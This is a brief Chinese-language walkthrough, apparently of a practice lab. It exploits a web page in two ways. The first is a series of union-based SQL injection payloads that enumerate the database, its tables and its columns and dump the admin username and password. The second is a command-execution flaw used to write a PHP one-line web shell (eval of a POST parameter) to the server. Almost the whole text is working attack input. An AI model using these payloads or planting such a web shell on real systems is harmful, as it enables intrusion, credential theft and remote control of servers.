打开网页
一.sql注入漏洞
1.输入框测试回显点
-1 union select 1,2,3#
2.查看数据库名
-1 union select 1,2,database()#
3.查看表名
-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#
4.查看admin表中列名
-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#
5.查看admin的账号和密码
-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#
账号为admin,密码为mysql
二:命令执行漏洞
1.页面下方有一个执行框,输入ls查看
2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php
3.写入一句话木马,访问69.php
echo '<?php @eval($_POST['cmd']);?>' > 69.php